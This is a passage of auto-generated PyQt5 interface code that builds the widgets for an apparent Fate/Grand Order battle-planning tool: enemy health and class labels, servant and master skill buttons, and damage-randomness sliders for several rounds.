self.gridLayout_7.addWidget(self.round1_enemy2_class, 1, 1, 1, 1)
self.round3_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy3_health.setText("")
self.round3_enemy3_health.setObjectName("round3_enemy3_health")
self.gridLayout_7.addWidget(self.round3_enemy3_health, 8, 0, 1, 1)
self.round1_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy3_health.setText("")
self.round1_enemy3_health.setObjectName("round1_enemy3_health")
self.gridLayout_7.addWidget(self.round1_enemy3_health, 2, 0, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.round1_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy1_pic.setEnabled(False)
self.round1_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setText("")
self.round1_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setObjectName("round1_enemy1_pic")
self.horizontalLayout.addWidget(self.round1_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout, 0, 2, 1, 1)
self.round2_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy3_health.setText("")
self.round2_enemy3_health.setObjectName("round2_enemy3_health")
self.gridLayout_7.addWidget(self.round2_enemy3_health, 5, 0, 1, 1)
self.round2_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy2_health.setText("")
self.round2_enemy2_health.setObjectName("round2_enemy2_health")
self.gridLayout_7.addWidget(self.round2_enemy2_health, 5, 1, 1, 1)
self.round3_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy2_health.setText("")
self.round3_enemy2_health.setObjectName("round3_enemy2_health")
self.gridLayout_7.addWidget(self.round3_enemy2_health, 8, 1, 1, 1)
self.round1_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy2_health.setText("")
self.round1_enemy2_health.setObjectName("round1_enemy2_health")
self.gridLayout_7.addWidget(self.round1_enemy2_health, 2, 1, 1, 1)
self.round2_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy1_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy1_class.setText("")
self.round2_enemy1_class.setObjectName("round2_enemy1_class")
self.gridLayout_7.addWidget(self.round2_enemy1_class, 4, 2, 1, 1)
self.round1_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy1_class.setMaximumSize(QtCore.QSize(150, 28))
self.round1_enemy1_class.setText("")
self.round1_enemy1_class.setObjectName("round1_enemy1_class")
self.gridLayout_7.addWidget(self.round1_enemy1_class, 1, 2, 1, 1)
self.round1_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy1_health.setText("")
self.round1_enemy1_health.setObjectName("round1_enemy1_health")
self.gridLayout_7.addWidget(self.round1_enemy1_health, 2, 2, 1, 1)
self.round2_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy1_health.setText("")
self.round2_enemy1_health.setObjectName("round2_enemy1_health")
self.gridLayout_7.addWidget(self.round2_enemy1_health, 5, 2, 1, 1)
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.round3_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy1_pic.setEnabled(False)
self.round3_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setText("")
self.round3_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setObjectName("round3_enemy1_pic")
self.horizontalLayout_12.addWidget(self.round3_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_12, 6, 2, 1, 1)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.round1_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy3_pic.setEnabled(False)
self.round1_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setText("")
self.round1_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setObjectName("round1_enemy3_pic")
self.horizontalLayout_5.addWidget(self.round1_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_5, 0, 0, 1, 1)
self.round3_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy2_class.setMaximumSize(QtCore.QSize(150, 28))
self.round3_enemy2_class.setText("")
self.round3_enemy2_class.setObjectName("round3_enemy2_class")
self.gridLayout_7.addWidget(self.round3_enemy2_class, 7, 1, 1, 1)
self.verticalLayout_4.addLayout(self.gridLayout_7)
self.verticalLayout_6.addLayout(self.verticalLayout_4)
self.horizontalLayout_15.addWidget(self.groupBox_2)
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
self.groupBox_3.setTitle("")
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_7.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_7.setSpacing(5)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.round1_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round1_label_random.setEnabled(False)
self.round1_label_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round1_label_random.setObjectName("round1_label_random")
self.verticalLayout_5.addWidget(self.round1_label_random)
self.round1_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round1_bar_random.setEnabled(False)
self.round1_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round1_bar_random.setMinimum(90)
self.round1_bar_random.setMaximum(110)
self.round1_bar_random.setProperty("value", 90)
self.round1_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round1_bar_random.setObjectName("round1_bar_random")
self.verticalLayout_5.addWidget(self.round1_bar_random)
self.gridLayout_2.addLayout(self.verticalLayout_5, 1, 8, 1, 1)
self.round1_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_np.setEnabled(False)
self.round1_servant2_np.setObjectName("round1_servant2_np")
self.gridLayout_2.addWidget(self.round1_servant2_np, 4, 5, 1, 1)
self.round1_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_np.setEnabled(False)
self.round1_servant3_np.setObjectName("round1_servant3_np")
self.gridLayout_2.addWidget(self.round1_servant3_np, 4, 6, 1, 1)
self.horizontalLayout_16 = QtWidgets.QHBoxLayout()
self.horizontalLayout_16.setObjectName("horizontalLayout_16")
self.round1_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_pic.setEnabled(False)
self.round1_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setText("")
self.round1_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setObjectName("round1_servant2_pic")
self.horizontalLayout_16.addWidget(self.round1_servant2_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_16, 1, 5, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.round1_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_pic.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.round1_servant1_pic.sizePolicy().hasHeightForWidth())
self.round1_servant1_pic.setSizePolicy(sizePolicy)
self.round1_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setText("")
self.round1_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setObjectName("round1_servant1_pic")
self.horizontalLayout_9.addWidget(self.round1_servant1_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_9, 1, 4, 1, 1)
self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
self.horizontalLayout_19.setObjectName("horizontalLayout_19")
self.round1_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_pic.setEnabled(False)
self.round1_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_master_pic.setText("")
self.round1_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_master_pic.setObjectName("round1_master_pic")
self.horizontalLayout_19.addWidget(self.round1_master_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_19, 1, 7, 1, 1)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.round1_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill1.setEnabled(False)
self.round1_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setText("")
self.round1_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setObjectName("round1_servant1_skill1")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill1)
self.round1_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill2.setEnabled(False)
self.round1_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setText("")
self.round1_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setObjectName("round1_servant1_skill2")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill2)
self.round1_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill3.setEnabled(False)
self.round1_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setText("")
self.round1_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setObjectName("round1_servant1_skill3")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_11, 3, 4, 1, 1)
self.horizontalLayout_17 = QtWidgets.QHBoxLayout()
self.horizontalLayout_17.setObjectName("horizontalLayout_17")
self.round1_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_pic.setEnabled(False)
self.round1_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setText("")
self.round1_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setObjectName("round1_servant3_pic")
self.horizontalLayout_17.addWidget(self.round1_servant3_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_17, 1, 6, 1, 1)
self.btn_round1_next = QtWidgets.QPushButton(self.groupBox_3)
self.btn_round1_next.setEnabled(False)
self.btn_round1_next.setMinimumSize(QtCore.QSize(0, 30))
self.btn_round1_next.setMaximumSize(QtCore.QSize(16777215, 30))
self.btn_round1_next.setObjectName("btn_round1_next")
self.gridLayout_2.addWidget(self.btn_round1_next, 3, 8, 1, 1)
self.round1_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_np.setEnabled(False)
self.round1_servant1_np.setObjectName("round1_servant1_np")
self.gridLayout_2.addWidget(self.round1_servant1_np, 4, 4, 1, 1)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.round1_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill1.setEnabled(False)
self.round1_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setText("")
self.round1_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setObjectName("round1_servant3_skill1")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill1)
self.round1_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill2.setEnabled(False)
self.round1_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setText("")
self.round1_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setObjectName("round1_servant3_skill2")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill2)
self.round1_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill3.setEnabled(False)
self.round1_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setText("")
self.round1_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setObjectName("round1_servant3_skill3")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_14, 3, 6, 1, 1)
self.horizontalLayout_18 = QtWidgets.QHBoxLayout()
self.horizontalLayout_18.setObjectName("horizontalLayout_18")
self.round1_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill1.setEnabled(False)
self.round1_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setText("")
self.round1_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setObjectName("round1_master_skill1")
self.horizontalLayout_18.addWidget(self.round1_master_skill1)
self.round1_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill2.setEnabled(False)
self.round1_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setText("")
self.round1_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setObjectName("round1_master_skill2")
self.horizontalLayout_18.addWidget(self.round1_master_skill2)
self.round1_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill3.setEnabled(False)
self.round1_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setText("")
self.round1_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setObjectName("round1_master_skill3")
self.horizontalLayout_18.addWidget(self.round1_master_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_18, 3, 7, 1, 1)
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.round1_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill1.setEnabled(False)
self.round1_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setText("")
self.round1_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setObjectName("round1_servant2_skill1")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill1)
self.round1_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill2.setEnabled(False)
self.round1_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setText("")
self.round1_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setObjectName("round1_servant2_skill2")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill2)
self.round1_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill3.setEnabled(False)
self.round1_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setText("")
self.round1_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setObjectName("round1_servant2_skill3")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_13, 3, 5, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_2)
self.gridLayout_4 = QtWidgets.QGridLayout()
self.gridLayout_4.setObjectName("gridLayout_4")
self.round2_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_np.setEnabled(False)
self.round2_servant3_np.setObjectName("round2_servant3_np")
self.gridLayout_4.addWidget(self.round2_servant3_np, 3, 5, 1, 1)
self.horizontalLayout_181 = QtWidgets.QHBoxLayout()
self.horizontalLayout_181.setObjectName("horizontalLayout_181")
self.round2_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill1.setEnabled(False)
self.round2_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setText("")
self.round2_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setObjectName("round2_master_skill1")
self.horizontalLayout_181.addWidget(self.round2_master_skill1)
self.round2_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill2.setEnabled(False)
self.round2_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setText("")
self.round2_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setObjectName("round2_master_skill2")
self.horizontalLayout_181.addWidget(self.round2_master_skill2)
self.round2_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill3.setEnabled(False)
self.round2_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setText("")
self.round2_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setObjectName("round2_master_skill3")
self.horizontalLayout_181.addWidget(self.round2_master_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_181, 1, 6, 1, 1)
self.round2_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_np.setEnabled(False)
self.round2_servant1_np.setObjectName("round2_servant1_np")
self.gridLayout_4.addWidget(self.round2_servant1_np, 3, 3, 1, 1)
self.horizontalLayout_171 = QtWidgets.QHBoxLayout()
self.horizontalLayout_171.setObjectName("horizontalLayout_171")
self.round2_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_pic.setEnabled(False)
self.round2_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setText("")
self.round2_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setObjectName("round2_servant3_pic")
self.horizontalLayout_171.addWidget(self.round2_servant3_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_171, 0, 5, 1, 1)
self.horizontalLayout_161 = QtWidgets.QHBoxLayout()
self.horizontalLayout_161.setObjectName("horizontalLayout_161")
self.round2_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_pic.setEnabled(False)
self.round2_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setText("")
self.round2_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setObjectName("round2_servant2_pic")
self.horizontalLayout_161.addWidget(self.round2_servant2_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_161, 0, 4, 1, 1)
self.horizontalLayout_131 = QtWidgets.QHBoxLayout()
self.horizontalLayout_131.setObjectName("horizontalLayout_131")
self.round2_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill1.setEnabled(False)
self.round2_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setText("")
self.round2_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setObjectName("round2_servant2_skill1")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill1)
self.round2_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill2.setEnabled(False)
self.round2_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setText("")
self.round2_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setObjectName("round2_servant2_skill2")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill2)
self.round2_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill3.setEnabled(False)
self.round2_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setText("")
self.round2_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setObjectName("round2_servant2_skill3")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_131, 1, 4, 1, 1)
self.horizontalLayout_141 = QtWidgets.QHBoxLayout()
self.horizontalLayout_141.setObjectName("horizontalLayout_141")
self.round2_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill1.setEnabled(False)
self.round2_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setText("")
self.round2_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setObjectName("round2_servant3_skill1")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill1)
self.round2_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill2.setEnabled(False)
self.round2_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setText("")
self.round2_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setObjectName("round2_servant3_skill2")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill2)
self.round2_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill3.setEnabled(False)
self.round2_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setText("")
self.round2_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setObjectName("round2_servant3_skill3")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_141, 1, 5, 1, 1)
self.btn_round2_next = QtWidgets.QPushButton(self.groupBox_3)
self.btn_round2_next.setEnabled(False)
self.btn_round2_next.setMinimumSize(QtCore.QSize(0, 30))
self.btn_round2_next.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.btn_round2_next.setObjectName("btn_round2_next")
self.gridLayout_4.addWidget(self.btn_round2_next, 1, 7, 1, 1)
self.horizontalLayout_191 = QtWidgets.QHBoxLayout()
self.horizontalLayout_191.setObjectName("horizontalLayout_191")
self.round2_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_pic.setEnabled(False)
self.round2_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_master_pic.setText("")
self.round2_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_master_pic.setObjectName("round2_master_pic")
self.horizontalLayout_191.addWidget(self.round2_master_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_191, 0, 6, 1, 1)
self.round2_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_np.setEnabled(False)
self.round2_servant2_np.setObjectName("round2_servant2_np")
self.gridLayout_4.addWidget(self.round2_servant2_np, 3, 4, 1, 1)
self.horizontalLayout_91 = QtWidgets.QHBoxLayout()
self.horizontalLayout_91.setObjectName("horizontalLayout_91")
self.round2_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_pic.setEnabled(False)
self.round2_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setText("")
self.round2_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setObjectName("round2_servant1_pic")
self.horizontalLayout_91.addWidget(self.round2_servant1_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_91, 0, 3, 1, 1)
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.round2_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round2_label_random.setEnabled(False)
self.round2_label_random.setObjectName("round2_label_random")
self.verticalLayout_12.addWidget(self.round2_label_random)
self.round2_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round2_bar_random.setEnabled(False)
self.round2_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round2_bar_random.setMinimum(90)
self.round2_bar_random.setMaximum(110)
self.round2_bar_random.setProperty("value", 90)
self.round2_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round2_bar_random.setObjectName("round2_bar_random")
self.verticalLayout_12.addWidget(self.round2_bar_random)
self.gridLayout_4.addLayout(self.verticalLayout_12, 0, 7, 1, 1)
self.horizontalLayout_111 = QtWidgets.QHBoxLayout()
self.horizontalLayout_111.setObjectName("horizontalLayout_111")
self.round2_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill1.setEnabled(False)
self.round2_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setText("")
self.round2_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setObjectName("round2_servant1_skill1")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill1)
self.round2_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill2.setEnabled(False)
self.round2_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setText("")
self.round2_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setObjectName("round2_servant1_skill2")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill2)
self.round2_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill3.setEnabled(False)
self.round2_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill3.setText("")
self.round2_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
